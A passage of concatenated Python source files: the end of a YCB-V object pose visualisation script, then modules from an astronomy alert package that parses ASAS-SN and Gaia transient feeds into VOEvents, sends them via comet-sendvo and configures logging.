scene_gt_dict[str(i)] = [inst]
info = {"bbox_obj": bbox, "bbox_visib": bbox}
scene_gt_info_dict[str(i)] = [info]
i += 1
progress_bar.update()
if i >= N_sample:
break
inout.save_json(scene_gt_file, scene_gt_dict)
inout.save_json(scene_gt_info_file, scene_gt_info_dict)
print(scene_gt_file)
print(scene_gt_info_file)
if __name__ == "__main__":
main()
```
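The Euler-angle construction in `random_rotation` should always yield a proper rotation matrix; a quick sanity check of that property (not part of the generation script itself):

```python
import numpy as np

R = random_rotation()
assert np.allclose(R @ R.T, np.eye(3), atol=1e-9)  # orthonormal rows/columns
assert np.isclose(np.linalg.det(R), 1.0)           # determinant +1, i.e. no reflection
```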
#### File: tools/ycbv/ycbv_3_vis_poses_full.py
```python
import mmcv
import os.path as osp
import numpy as np
import sys
from tqdm import tqdm
from detectron2.data import DatasetCatalog, MetadataCatalog
from detectron2.structures import BoxMode
import torch
import pandas as pd
cur_dir = osp.dirname(osp.abspath(__file__))
sys.path.insert(0, osp.join(cur_dir, "../../../../"))
from lib.vis_utils.colormap import colormap
from lib.utils.mask_utils import mask2bbox_xyxy, cocosegm2mask, get_edge
from core.utils.data_utils import read_image_mmcv
from core.gdrn_modeling.datasets.dataset_factory import register_datasets
from transforms3d.quaternions import quat2mat
from lib.egl_renderer.egl_renderer_v3 import EGLRenderer
score_thr = 0.3
colors = colormap(rgb=False, maximum=255)
# object info
id2obj = {
1: "002_master_chef_can", # [1.3360, -0.5000, 3.5105]
2: "003_cracker_box", # [0.5575, 1.7005, 4.8050]
3: "004_sugar_box", # [-0.9520, 1.4670, 4.3645]
4: "005_tomato_soup_can", # [-0.0240, -1.5270, 8.4035]
5: "006_mustard_bottle", # [1.2995, 2.4870, -11.8290]
6: "007_tuna_fish_can", # [-0.1565, 0.1150, 4.2625]
7: "008_pudding_box", # [1.1645, -4.2015, 3.1190]
8: "009_gelatin_box", # [1.4460, -0.5915, 3.6085]
9: "010_potted_meat_can", # [2.4195, 0.3075, 8.0715]
10: "011_banana", # [-18.6730, 12.1915, -1.4635]
11: "019_pitcher_base", # [5.3370, 5.8855, 25.6115]
12: "021_bleach_cleanser", # [4.9290, -2.4800, -13.2920]
13: "024_bowl", # [-0.2270, 0.7950, -2.9675]
14: "025_mug", # [-8.4675, -0.6995, -1.6145]
15: "035_power_drill", # [9.0710, 20.9360, -2.1190]
16: "036_wood_block", # [1.4265, -2.5305, 17.1890]
17: "037_scissors", # [7.0535, -28.1320, 0.0420]
18: "040_large_marker", # [0.0460, -2.1040, 0.3500]
19: "051_large_clamp", # [10.5180, -1.9640, -0.4745]
20: "052_extra_large_clamp", # [-0.3950, -10.4130, 0.1620]
21: "061_foam_brick", # [-0.0805, 0.0805, -8.2435]
}
objects = list(id2obj.values())
def load_predicted_csv(fname):
df = pd.read_csv(fname)
info_list = df.to_dict("records")
return info_list
def parse_Rt_in_csv(_item):
return np.array([float(i) for i in _item.strip(" ").split(" ")])
width = 640
height = 480
tensor_kwargs = {"device": torch.device("cuda"), "dtype": torch.float32}
image_tensor = torch.empty((height, width, 4), **tensor_kwargs).detach()
seg_tensor = torch.empty((height, width, 4), **tensor_kwargs).detach()
# image_tensor = torch.empty((480, 640, 4), **tensor_kwargs).detach()
model_dir = "datasets/BOP_DATASETS/ycbv/models/"
model_paths = [osp.join(model_dir, f"obj_{obj_id:06d}.ply") for obj_id in id2obj]
texture_paths = [osp.join(model_dir, f"obj_{obj_id:06d}.png") for obj_id in id2obj]
ren = EGLRenderer(
model_paths, texture_paths=texture_paths, vertex_scale=0.001, use_cache=True, width=width, height=height
)
# NOTE: this is for ycbv_bop_test
pred_path = "output/gdrn/ycbv/a6_cPnP_AugAAETrunc_BG0.5_ycbv_real_pbr_visib20_20e_allObjs/a6-cPnP-AugAAETrunc-BG0.5-ycbv-real-pbr-visib20-20e-singleObjMerged-bop-test-iter0_ycbv-test.csv"
vis_dir = "output/gdrn/ycbv/a6_cPnP_AugAAETrunc_BG0.5_ycbv_real_pbr_visib20_20e_allObjs/ycbv_test_keyframe/ycbv_vis_gt_pred_full"
mmcv.mkdir_or_exist(vis_dir)
print(pred_path)
preds_csv = load_predicted_csv(pred_path)
preds = {}
for item in preds_csv:
im_key = "{}/{}".format(item["scene_id"], item["im_id"])
item["time"] = float(item["time"])
item["score"] = float(item["score"])
item["R"] = parse_Rt_in_csv(item["R"]).reshape(3, 3)
item["t"] = parse_Rt_in_csv(item["t"]) / 1000
item["obj_name"] = id2obj[item["obj_id"]]
if im_key not in preds:
preds[im_key] = []
preds[im_key].append(item)
dataset_name = "ycbv_test"
print(dataset_name)
register_datasets([dataset_name])
meta = MetadataCatalog.get(dataset_name)
print("MetadataCatalog: ", meta)
objs = meta.objs
dset_dicts = DatasetCatalog.get(dataset_name)
for d in tqdm(dset_dicts):
K = d["cam"]
file_name = d["file_name"]
scene_im_id = d["scene_im_id"]
img = read_image_mmcv(file_name, format="BGR")
scene_im_id_split = d["scene_im_id"].split("/")
scene_id = scene_im_id_split[0]
im_id = int(scene_im_id_split[1])
imH, imW = img.shape[:2]
annos = d["annotations"]
masks = [cocosegm2mask(anno["segmentation"], imH, imW) for anno in annos]
fg_mask = sum(masks).astype("bool").astype("uint8")
minx, miny, maxx, maxy = mask2bbox_xyxy(fg_mask)
bboxes = [anno["bbox"] for anno in annos]
bbox_modes = [anno["bbox_mode"] for anno in annos]
bboxes_xyxy = np.array(
[BoxMode.convert(box, box_mode, BoxMode.XYXY_ABS) for box, box_mode in zip(bboxes, bbox_modes)]
)
quats = [anno["quat"] for anno in annos]
transes = [anno["trans"] for anno in annos]
Rs = [quat2mat(quat) for quat in quats]
# 0-based label
cat_ids = [anno["category_id"] for anno in annos]
obj_names = [objs[cat_id] for cat_id in cat_ids]
gt_Rs = []
gt_ts = []
gt_labels = []
for anno_i, anno in enumerate(annos):
obj_name = obj_names[anno_i]
gt_labels.append(objects.index(obj_name)) # 0-based label
gt_Rs.append(Rs[anno_i])
gt_ts.append(transes[anno_i])
if scene_im_id not in preds:
print(scene_im_id, "not detected")
continue
cur_preds = preds[scene_im_id]
kpts_2d_est = []
est_Rs = []
est_ts = []
est_labels = []
for pred_i, pred in enumerate(cur_preds):
try:
R_est = pred["R"]
t_est = pred["t"]
score = pred["score"]
obj_name = pred["obj_name"]
except KeyError:  # skip prediction entries missing any pose field
continue
if score < score_thr:
continue
est_Rs.append(R_est)
est_ts.append(t_est)
est_labels.append(objects.index(obj_name)) # 0-based label
im_gray = mmcv.bgr2gray(img, keepdim=True)
im_gray_3 = np.concatenate([im_gray, im_gray, im_gray], axis=2)
gt_poses = [np.hstack([_R, _t.reshape(3, 1)]) for _R, _t in zip(gt_Rs, gt_ts)]
est_poses = [np.hstack([_R, _t.reshape(3, 1)]) for _R, _t in zip(est_Rs, est_ts)]
ren.render(est_labels, est_poses, K=K, image_tensor=image_tensor, background=im_gray_3)
ren_bgr = (image_tensor[:, :, :3].detach().cpu().numpy() + 0.5).astype("uint8")
for gt_label, gt_pose in zip(gt_labels, gt_poses):
ren.render([gt_label], [gt_pose], K=K, seg_tensor=seg_tensor)
gt_mask = (seg_tensor[:, :, 0].detach().cpu().numpy() > 0).astype("uint8")
gt_edge = get_edge(gt_mask, bw=3, out_channel=1)
ren_bgr[gt_edge != 0] = np.array(mmcv.color_val("blue"))
for est_label, est_pose in zip(est_labels, est_poses):
ren.render([est_label], [est_pose], K=K, seg_tensor=seg_tensor)
est_mask = (seg_tensor[:, :, 0].detach().cpu().numpy() > 0).astype("uint8")
est_edge = get_edge(est_mask, bw=3, out_channel=1)
ren_bgr[est_edge != 0] = np.array(mmcv.color_val("green"))
vis_im = ren_bgr
save_path_0 = osp.join(vis_dir, "{}_{:06d}_vis0.png".format(scene_id, im_id))
mmcv.imwrite(img, save_path_0)
save_path_1 = osp.join(vis_dir, "{}_{:06d}_vis1.png".format(scene_id, im_id))
mmcv.imwrite(vis_im, save_path_1)
# if True:
# # grid_show([img[:, :, ::-1], vis_im[:, :, ::-1]], ["im", "est"], row=1, col=2)
# # im_show = cv2.hconcat([img, vis_im, vis_im_add])
# im_show = cv2.hconcat([img, vis_im])
# cv2.imshow("im_est", im_show)
# if cv2.waitKey(0) == 27:
# break # esc to quit
# ffmpeg -r 5 -f image2 -s 1920x1080 -pattern_type glob -i "./ycbv_vis_gt_pred_full_video/*.png" -vcodec libx264 -crf 25 -pix_fmt yuv420p ycbv_vis_video.mp4
``` |
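The results CSV parsed above stores each pose as flat strings: `R` is nine space-separated floats in row-major order and `t` is three floats in millimetres. A minimal sketch of the same parsing on made-up values:

```python
import numpy as np

row = {"R": "1 0 0 0 1 0 0 0 1", "t": "100 -50 900"}
R = np.array([float(x) for x in row["R"].strip(" ").split(" ")]).reshape(3, 3)
t = np.array([float(x) for x in row["t"].strip(" ").split(" ")]) / 1000  # mm -> m
assert R.shape == (3, 3) and np.isclose(t[2], 0.9)
```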
{
"source": "4pisky/fourpisky-core",
"score": 2
} |
#### File: fourpisky/comms/comet.py
```python
from __future__ import absolute_import
import logging
import subprocess
import voeventparse
import tempfile
import textwrap
logger = logging.getLogger(__name__)
def send_voevent(voevent, host='localhost', port=8098):
logger.debug("comet-sendvo voevent: {}".format(voevent.attrib['ivorn']))
tf = tempfile.TemporaryFile()
voeventparse.dump(voevent, tf)
tf.seek(0)
# tf.close()
try:
cmd = ['comet-sendvo']
cmd.append('--host=' + host)
cmd.append('--port=' + str(port))
output = subprocess.check_output(cmd, stdin=tf, )
except subprocess.CalledProcessError as e:
logger.error(f"send_voevent failed, output was: {e.output}")
raise e
return output
def dummy_send_to_comet_stub(voevent, host='localhost', port=8098):
tf = tempfile.NamedTemporaryFile(delete=False)
logmsg=textwrap.dedent("""\
*************
Would have sent a VOEvent to node: {host}:{port};
IVORN: {ivorn}
Copy of XML dumped to: {fname}
*************
""".format(host=host, port=port, ivorn=voevent.attrib['ivorn'],
fname=tf.name))
logger.debug(logmsg)
voeventparse.dump(voevent, tf)
tf.close()
# raise subprocess.CalledProcessError(1, 'dummyvosend')
```
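A usage sketch for the two senders above, assuming a Comet broker is listening on localhost:8098 and that the packet is loaded with voeventparse; the filename is hypothetical:

```python
import subprocess
import voeventparse

with open("new_alert.xml", "rb") as f:
    packet = voeventparse.load(f)

try:
    send_voevent(packet, host="localhost", port=8098)
except subprocess.CalledProcessError:
    # comet-sendvo failed or is unavailable; fall back to the stub,
    # which just dumps the packet to a temp file and logs its path.
    dummy_send_to_comet_stub(packet)
```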
#### File: fourpisky/feeds/asassn.py
```python
import lxml
import lxml.html
from collections import defaultdict
import voeventparse as vp
import datetime
import iso8601
from astropy.coordinates import SkyCoord
import astropy.units as u
from fourpisky.voevent import (
create_skeleton_4pisky_voevent,
asassn_alert_substream,
get_stream_ivorn_prefix,
)
from fourpisky.feeds.feedbase import FeedBase
import logging
logger = logging.getLogger(__name__)
ASSASN_BAD_IDS = [
'ASASSN-15uh', # Datestamp has been replaced with junk
'ASASSN-15co', # Datestamp has been replaced with junk
'Comet ASASSN1', # Moving object
]
ASASSN_TIMESTAMP_ID_MAP = {
'2013-09-14.53': 'iPTF13dge', # Malformed href in other id col.
}
ASASSN_EARLIEST_REPARSE_DATE=iso8601.parse_date("2017-10-18")
class AsassnFeed(FeedBase):
name = "ASASSN webpage"
url = "http://www.astronomy.ohio-state.edu/asassn/transients.html"
substream = asassn_alert_substream
stream_ivorn_prefix = get_stream_ivorn_prefix(substream)
hash_byte_range = (0, 10000)
hash_cache_path = None
# VOEvent details:
text_params_groupname = 'asassn_params'
url_params_groupname = 'asassn_urls'
def __init__(self, hash_cache_path=None):
super(AsassnFeed, self).__init__(hash_cache_path)
def generate_voevent(self, feed_id):
rowdict = self.event_id_data_map[feed_id]
params = rowdict['param']
urls = rowdict['url']
stream_id = self.feed_id_to_stream_id(feed_id)
v = create_skeleton_4pisky_voevent(substream=self.substream,
stream_id=stream_id,
role=vp.definitions.roles.observation,
date=datetime.datetime.utcnow()
)
vp.add_how(v, references=vp.Reference(uri=self.url))
v.How.Description = "Parsed from ASASSN listings page by 4PiSky-Bot."
timestamp_dt = asassn_timestamp_str_to_datetime(
params[AsassnKeys.detection_timestamp])
posn_sc = SkyCoord(params['ra'], params['dec'],
unit=(u.hourangle, u.deg))
# Couldn't find a formal analysis of positional accuracy, but
# http://dx.doi.org/10.1088/0004-637X/788/1/48
# states the angular resolution as 16 arcseconds, so we'll go with that.
err_radius_estimate = 16 * u.arcsec
posn_simple = vp.Position2D(ra=posn_sc.ra.deg,
dec=posn_sc.dec.deg,
err=err_radius_estimate.to(u.deg).value,
units=vp.definitions.units.degrees,
system=vp.definitions.sky_coord_system.utc_icrs_geo,
)
vp.add_where_when(
v,
coords=posn_simple,
obs_time=timestamp_dt,
observatory_location=vp.definitions.observatory_location.geosurface)
asassn_params = [vp.Param(key, params[key]) for key in
(AsassnKeys.id_asassn,
AsassnKeys.id_other,
AsassnKeys.detection_timestamp,
AsassnKeys.ra,
AsassnKeys.dec,
AsassnKeys.spec_class,
AsassnKeys.comment,
)
if key in params
]
if AsassnKeys.mag_v in params:
asassn_params.append(
vp.Param(AsassnKeys.mag_v, params[AsassnKeys.mag_v],
unit='mag', ucd="phot.mag",
)
)
if AsassnKeys.id_other in urls:
asassn_params.append(
vp.Param(AsassnKeys.id_other,
urls[AsassnKeys.id_other][0][0])
)
asassn_urls = [vp.Param(key, urls[key][0][1]) for key in urls]
v.What.append(vp.Group(params=asassn_params,
name=self.text_params_groupname))
v.What.append(vp.Group(params=asassn_urls,
name=self.url_params_groupname))
return v
def event_data_to_event_id(self, event_data):
"""
Derive a feed-specific identifier for a given event.
Args:
event_data: Feed specific datastructure, typically just a dictionary.
NB the feed id should contain a timestamp prefix followed by an underscore;
we use this for deduplication.
(Even if the event details are updated the timestamp should remain the
same.)
"""
# OK. Fiddly date-string formatting. Aim here is to get a uniform
# date-time format so that anything ordered by IVORN will also
# be date-time ordered. Users can always check the XML content
# for the original ASSASSN timestamp-string.
# We parse-and-reformat the date-string to zero-pad the day digit as
# needed.
# Finally, we regenerate the 'decimal-days' suffix,
# fixed at 2 decimal places.
# (since some earlier events don't have this suffix at all we can't
# just tokenize it).
external_id = extract_asassn_id(event_data)
timestamp_input_string = event_data['param'][
AsassnKeys.detection_timestamp]
timestamp_dt = asassn_timestamp_str_to_datetime(
timestamp_input_string).replace(tzinfo=None)
uniform_date_str = timestamp_dt.strftime('%Y-%m-%d')
start_of_day = datetime.datetime(timestamp_dt.year,
timestamp_dt.month,
timestamp_dt.day
)
# Friday afternoon kludge:
day_fraction_float = (
(timestamp_dt - start_of_day).total_seconds() / 3600. / 24.
)
day_fraction_str = f"{day_fraction_float:.2f}"[1:]
feed_id = ''.join((uniform_date_str, day_fraction_str,
'_', external_id))
return feed_id
def get_ivorn_prefixes_for_duplicate(self, feed_id):
"""
Determines what a possible duplicate ivorn might be prefixed by.
For ASASSN - assumes timestamp unchanging even if the
event gets renamed. We match on the substream + timestamp
(i.e. everything up to the first underscore in the stream_id).
"""
stream_id = self.feed_id_to_stream_id(feed_id)
return [
self.stream_ivorn_prefix + stream_id.split('_', 1)[0],
]
def parse_content_to_event_data_list(self):
tree = lxml.html.fromstring(self.content)
events = transform_pagetree(tree)
return events
# ==========================================================================
def extract_asassn_id(rowdict):
params = rowdict['param']
urls = rowdict['url']
# print group_params
# print urls
# Check for known-bad rows, manually resolved:
timestamp = params[AsassnKeys.detection_timestamp]
if timestamp in ASASSN_TIMESTAMP_ID_MAP:
return ASASSN_TIMESTAMP_ID_MAP[timestamp]
# Now try to parse any vaguely reasonable data
asassn_id = params.get(AsassnKeys.id_asassn)
if asassn_id is not None:
if asassn_id.startswith('ASASSN') or asassn_id.startswith('ASASN'):
external_id = asassn_id
else:
raise ValueError(
f'Could not extract Id for row- unrecognised id format: {asassn_id}')
else:
# Ensure ASASSN ID is not something weird
assert asassn_id is None
# Then, look for alt-id
alt_id_text = params.get(AsassnKeys.id_other)
alt_id_url = urls.get(AsassnKeys.id_other)
# Otherwise, check for alt_id text:
if alt_id_text:
external_id = alt_id_text.strip()
elif alt_id_url:
first_url_text_href_pair = alt_id_url[0]
external_id = first_url_text_href_pair[0]
else:
cell = rowdict['raw'][asassn_headers_2018.index('ATEL')]
# print cell.text
# print [c.text for c in cell.getchildren()]
# print '-------------------'
# print '-------------------'
raise ValueError('Could not extract Id for this row, '
'no id found')
return external_id
def asassn_timestamp_str_to_datetime(timestamp_str):
if '.' in timestamp_str:
date_str, day_fraction_str = timestamp_str.split('.')
day_fraction_str = '0.' + day_fraction_str
else:
date_str = timestamp_str
day_fraction_str = '0.'  # keep it a string so float() below handles both branches uniformly
timestamp_dt = (iso8601.parse_date(date_str) +
datetime.timedelta(days=float(day_fraction_str)))
return timestamp_dt
# =======================================================================
asassn_headers_2018 = (
'ASAS-SN',
'Other',
'ATEL',
'RA',
'Dec',
'Discovery',
'V/g',
'SDSS',
'DSS',
'Vizier',
'Spectroscopic Class',
'Comments'
)
asassn_ncols = len(asassn_headers_2018)
class AsassnKeys():
id_asassn = 'id_assasn'
id_other = 'id_other'
atel_url = 'atel_url'
ra = 'ra'
dec = 'dec'
detection_timestamp = 'detection_timestamp'
mag_v = 'mag_v'
sdss_url = 'sdss_url'
dss_url = 'dss_url'
vizier_url = 'vizier_url'
spec_class = 'spec_class'
comment = 'comment'
asassn_hdr_to_internal_key_map = {
'ASAS-SN': AsassnKeys.id_asassn,
'Other': AsassnKeys.id_other,
'ATEL': AsassnKeys.atel_url,
'RA': AsassnKeys.ra,
'Dec': AsassnKeys.dec,
'Discovery': AsassnKeys.detection_timestamp,
'V/g': AsassnKeys.mag_v,
'SDSS': AsassnKeys.sdss_url,
'DSS': AsassnKeys.dss_url,
'Vizier': AsassnKeys.vizier_url,
'Spectroscopic Class': AsassnKeys.spec_class,
'Comments': AsassnKeys.comment,
}
assert tuple(asassn_hdr_to_internal_key_map.keys()) == asassn_headers_2018
asassn_url_only_keys = (
AsassnKeys.atel_url,
AsassnKeys.sdss_url,
AsassnKeys.dss_url,
AsassnKeys.vizier_url,
)
def extract_etree_cells(tree):
tbl = tree.xpath('//table')[0]
children = tbl.getchildren()
# expect two header rows, then a malformed data row. Joy.
assert children[0].tag == 'tr'
assert children[1].tag == 'tr'
assert children[2].tag != 'tr'
cells = children[2:]
headers = tuple([c.text for c in children[0].getchildren()])
# We expect a multiple of assasn_ncols:
assert (len(cells) % asassn_ncols) == 0
# Check headers unchanged
assert headers == asassn_headers_2018
return cells
def asassn_htmlrow_to_dict(cellrow):
param_dict = {}
url_dict = defaultdict(list)
for idx, col_hdr in enumerate(asassn_headers_2018):
param_key = asassn_hdr_to_internal_key_map[col_hdr]
elt = cellrow[idx]
if elt.text and not col_hdr in asassn_url_only_keys:
text = elt.text.strip()
param_dict[param_key] = text
children = elt.getchildren()
if children:
for child in children:
if 'href' in child.attrib:
url_dict[param_key].append(
(child.text, child.attrib['href'])
)
# Delete any entries which are merely placeholders, e.g. '-----'.
trimmed_params = {}
for k, v in param_dict.items():
if not len(v.strip().replace('-', '')):
continue # Skip this one if it's a '------' style placeholder
trimmed_params[k] = v
return {'param': trimmed_params,
'url': url_dict,
'raw': cellrow
}
def transform_pagetree(tree):
"""
Restructure an array of cells into a list of dictionaries
Since parsing to this stage is robust, we also perform bad-row excision here.
"""
cells = extract_etree_cells(tree)
cellrows = []
# Stride through cells at rowlength inferred by ncols
for row_idx, _ in enumerate(cells[::asassn_ncols]):
# Select all cells in current stride, create list representing row
row = [c for c in cells[
asassn_ncols * row_idx:asassn_ncols * row_idx + asassn_ncols]]
cellrows.append(row)
events = []
for cr in cellrows:
event_dict = asassn_htmlrow_to_dict(cr)
row_id = event_dict['param'].get(AsassnKeys.id_asassn)
if row_id in ASSASN_BAD_IDS:
logger.warning('Removed bad ASASSN row with ID {}'.format(row_id))
continue
try:
row_timestamp = asassn_timestamp_str_to_datetime(
event_dict['param'].get(AsassnKeys.detection_timestamp)
)
if not row_timestamp > ASASSN_EARLIEST_REPARSE_DATE:
continue
events.append(event_dict)
except Exception:
logger.exception('Error parsing rowdict:' + str(event_dict))
raise
return events
```
#### File: fourpisky/feeds/gaia.py
```python
from io import BytesIO, StringIO
import contextlib
import csv
import datetime
import logging
import astropy.time
import astropy.units as u
import pytz
import voeventparse as vp
from astropy.coordinates import SkyCoord
from fourpisky.feeds.feedbase import FeedBase
from fourpisky.voevent import (
create_skeleton_4pisky_voevent,
gaia_alert_substream,
get_stream_ivorn_prefix,
)
logger = logging.getLogger(__name__)
class GaiaKeys():
"""
Col headers used in CSV
Full definitions at http://gsaweb.ast.cam.ac.uk/alerts/tableinfo
"""
# Name, Date, RaDeg, DecDeg, AlertMag, HistoricMag, HistoricStdDev, Class, Published, Comment
name = '#Name'
obs_timestamp = ' Date'
pub_timestamp = ' Published'
ra = ' RaDeg'
dec = ' DecDeg'
mag_alert = ' AlertMag'
mag_historic = ' HistoricMag'
mag_historic_std_dev = ' HistoricStdDev'
alert_class = ' Class'
comment = ' Comment'
class GaiaFeed(FeedBase):
name = "GAIA science alerts"
url = "http://gsaweb.ast.cam.ac.uk/alerts/alerts.csv"
substream = gaia_alert_substream
stream_ivorn_prefix = get_stream_ivorn_prefix(substream)
hash_byte_range = (0, 10000)
hash_cache_path = None
# VOEvent details:
text_params_groupname = 'gsaweb_params'
def __init__(self, hash_cache_path=None):
super(GaiaFeed, self).__init__(hash_cache_path)
def parse_content_to_event_data_list(self):
with contextlib.closing(StringIO(self.content.decode())) as f:
rdr = csv.DictReader(f)
events = [row for row in rdr]
return events
def event_data_to_event_id(self, event_data):
"""
Derive a feed-specific identifier for a given event.
Args:
event_data: Feed specific datastructure, typically just a dictionary.
"""
return event_data[GaiaKeys.name]
def get_ivorn_prefixes_for_duplicate(self, feed_id):
"""
Determines what a possible duplicate ivorn might be prefixed by.
For GAIA - events are already uniquely identified within a stream by
their GAIA ID.
However, we now need to also check if there has been a direct VOEvent
submitted from the GAIA service (vs one scraped via their CSV page):
"""
return [self.feed_id_to_ivorn(feed_id),
'ivo://gaia.cam.uk/alerts#'+feed_id,
]
def generate_voevent(self, feed_id):
event_data = self.event_id_data_map[feed_id]
stream_id = self.feed_id_to_stream_id(feed_id)
v = create_skeleton_4pisky_voevent(substream=self.substream,
stream_id=stream_id,
role=vp.definitions.roles.observation,
date=datetime.datetime.utcnow()
)
gsaw_event_url = 'http://gsaweb.ast.cam.ac.uk/alerts/alert/'+feed_id
vp.add_how(v, references=[vp.Reference(uri=self.url),
vp.Reference(uri=gsaw_event_url)
]
)
v.How.Description = "Parsed from GAIA Science Alerts listings by 4PiSky-Bot."
posn_sc = SkyCoord(event_data[GaiaKeys.ra],
event_data[GaiaKeys.dec],
unit=(u.deg, u.deg))
# Astrometric accuracy is a guesstimate,
# http://gsaweb.ast.cam.ac.uk/alerts/tableinfo states that:
# "The sky position may either refer to a source in Gaia's own
# catalogue, or to a source in an external catalogue (e.g. SDSS) used as
# a reference for combining Gaia observations. Where the position comes
# from Gaia's catalogue, it is derived from a single, Gaia observation
# at the triggering point of the alert; this is not an astrometric
# measurement to the full precision of the Gaia main mission."
#
# We assume a 'worst-case' scenario of 100mas from SDSS at mag r=22, cf
# http://classic.sdss.org/dr7/products/general/astrometry.html
err_radius_estimate = 0.1 * u.arcsec
posn_simple = vp.Position2D(ra=posn_sc.ra.deg,
dec=posn_sc.dec.deg,
err=err_radius_estimate.to(u.deg).value,
units=vp.definitions.units.degrees,
system=vp.definitions.sky_coord_system.utc_icrs_geo,
)
# NB GAIA values are in Barycentric co-ordinate time
# (http://en.wikipedia.org/wiki/Barycentric_Coordinate_Time)
observation_time_tcb = astropy.time.Time(
event_data[GaiaKeys.obs_timestamp],
scale='tcb')
# We convert to UTC, in keeping with other feeds:
observation_time_utc_dt = observation_time_tcb.utc.datetime
observation_time_utc_dt = observation_time_utc_dt.replace(tzinfo=pytz.UTC)
vp.add_where_when(
v,
coords=posn_simple,
obs_time=observation_time_utc_dt,
observatory_location=vp.definitions.observatory_location.geosurface)
gaia_params = [vp.Param('Name', event_data[GaiaKeys.name])]
gaia_params.extend([vp.Param(key.strip(), event_data[key]) for key in
(GaiaKeys.alert_class,
GaiaKeys.obs_timestamp,
GaiaKeys.pub_timestamp,
GaiaKeys.ra,
GaiaKeys.dec,
GaiaKeys.comment,
)
])
gaia_params.extend([vp.Param(key.strip(), event_data[key],
unit='mag', ucd='phot.mag') for key in (
GaiaKeys.mag_alert,
GaiaKeys.mag_historic,
GaiaKeys.mag_historic_std_dev,
)
])
v.What.append(vp.Group(params=gaia_params,
name=self.text_params_groupname))
return v
# ==========================================================================
```
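The observation timestamps above are published in barycentric coordinate time (TCB) and converted to UTC via astropy; a minimal stand-alone sketch of that conversion (the date is arbitrary):

```python
import astropy.time
import pytz

t_tcb = astropy.time.Time("2016-06-05T12:00:00", scale="tcb")
t_utc = t_tcb.utc.datetime.replace(tzinfo=pytz.UTC)
print(t_utc.isoformat())  # slightly earlier than the TCB stamp, now timezone-aware
```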
#### File: fourpisky-core/fourpisky/log_config.py
```python
import logging
import logging.handlers
from fourpisky.reports import EmailHandler
from fourpisky.local import contacts
full_date_fmt = "%y-%m-%d (%a) %H:%M:%S"
short_date_fmt = "%H:%M:%S"
verbose_formatter = logging.Formatter(
'%(asctime)s:%(name)s:%(levelname)s:%(message)s',
# '%(asctime)s:%(levelname)s:%(message)s',
full_date_fmt)
def setup_logfile_handlers(logger, logfile_pathstem, filters=None,
log_chunk_bytesize = 5e6):
info_logfile_path = logfile_pathstem + ".log"
debug_logfile_path = logfile_pathstem + ".debug.log"
info_filehandler = logging.handlers.RotatingFileHandler(
info_logfile_path, maxBytes=log_chunk_bytesize, backupCount=10)
info_filehandler.setLevel(logging.INFO)
debug_filehandler = logging.handlers.RotatingFileHandler(
debug_logfile_path, maxBytes=log_chunk_bytesize, backupCount=10)
debug_filehandler.setLevel(logging.DEBUG)
for fh in (info_filehandler, debug_filehandler):
fh.setFormatter(verbose_formatter)
if filters:
for f in filters:
fh.addFilter(f)
logger.addHandler(fh)
def setup_email_errorhandler(logger):
email_handler = EmailHandler(
recipients=[p.email for p in contacts.error_contacts])
email_handler.setFormatter(verbose_formatter)
email_handler.setLevel(logging.ERROR)
logger.addHandler(email_handler)
def setup_logging(logfile_pathstem=None, email_errors=True):
"""
Set up default logging setup
"""
std_formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s',
short_date_fmt)
stdout_logger = logging.StreamHandler()
stdout_logger.setFormatter(std_formatter)
stdout_logger.setLevel(logging.DEBUG)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logger.handlers = []
logger.addHandler(stdout_logger)
if logfile_pathstem:
setup_logfile_handlers(logger,logfile_pathstem)
if email_errors:
setup_email_errorhandler(logger)
return logger
```
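A minimal usage sketch of the module above (the logfile path stem is an arbitrary example, not something the package prescribes):

```python
import logging

from fourpisky.log_config import setup_logging

# Root logger gets stdout output, rotating info/debug logfiles and, optionally, email alerts.
setup_logging(logfile_pathstem="/tmp/fourpisky_demo", email_errors=False)
logging.getLogger(__name__).info("logging configured")
```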
#### File: fourpisky/scripts/inject_test_events.py
```python
import click
from fourpisky.comms import comet
import logging
import logging.handlers
from fourpisky.voevent import create_alarrm_obs_test_event
import voeventparse as vp
def main(logfile, process_function=comet.send_voevent):
setup_logging(logfile)
logger = logging.getLogger('inject-test-event')
v = create_alarrm_obs_test_event()
process_function(v)
logger.info(
"Processed test Voevent: {}".format(v.attrib['ivorn']))
def save_to_tmpfile(voevent):
testpacket_tmpfile_path = "/tmp/fps_alarrm_testpacket.xml"
with open(testpacket_tmpfile_path, 'w') as f:
logger = logging.getLogger()
vp.dump(voevent, f)
logger.debug("Saved packet to "+testpacket_tmpfile_path)
@click.command()
@click.option('--logfile', type=click.Path(),
default='inject_test_events.log')
@click.option('--testrun', is_flag=True)
def cli(logfile, testrun):
"""
Trivial wrapper about main to create a command line interface entry-point.
"""
if testrun:
main(logfile, process_function=save_to_tmpfile)
else:
main(logfile)
def setup_logging(logfile_path):
"""
Set up INFO- and DEBUG-level logfiles
"""
full_date_fmt = "%y-%m-%d (%a) %H:%M:%S"
short_date_fmt = "%H:%M:%S"
std_formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s',
short_date_fmt)
named_formatter = logging.Formatter(
'%(asctime)s:%(name)s:%(levelname)s:%(message)s',
# '%(asctime)s:%(levelname)s:%(message)s',
full_date_fmt)
#Get to the following size before splitting log into multiple files:
log_chunk_bytesize = 5e6
info_logfile_path = logfile_path
debug_logfile_path = logfile_path+".debug"
info_logger = logging.handlers.RotatingFileHandler(info_logfile_path,
maxBytes=log_chunk_bytesize, backupCount=10)
info_logger.setFormatter(named_formatter)
info_logger.setLevel(logging.INFO)
debug_logger = logging.handlers.RotatingFileHandler(debug_logfile_path,
maxBytes=log_chunk_bytesize, backupCount=10)
debug_logger.setFormatter(named_formatter)
debug_logger.setLevel(logging.DEBUG)
stdout_logger = logging.StreamHandler()
stdout_logger.setFormatter(std_formatter)
# stdout_logger.setLevel(logging.INFO)
stdout_logger.setLevel(logging.DEBUG)
#Set up root logger
logger = logging.getLogger()
logger.handlers=[]
logger.setLevel(logging.DEBUG)
logger.addHandler(info_logger)
logger.addHandler(debug_logger)
logger.addHandler(stdout_logger)
# logging.getLogger('iso8601').setLevel(logging.INFO) #Suppress iso8601 logging
```
#### File: fourpisky/scripts/process_voevent.py
```python
import click
import datetime, pytz
import logging
import os
import subprocess
import voeventparse
from fourpisky.local import contacts
from fourpisky.local import amicomms_safe as amicomms
import fourpisky.log_config
from fourpisky.reports import (generate_report_text, send_report,
generate_testresponse_text)
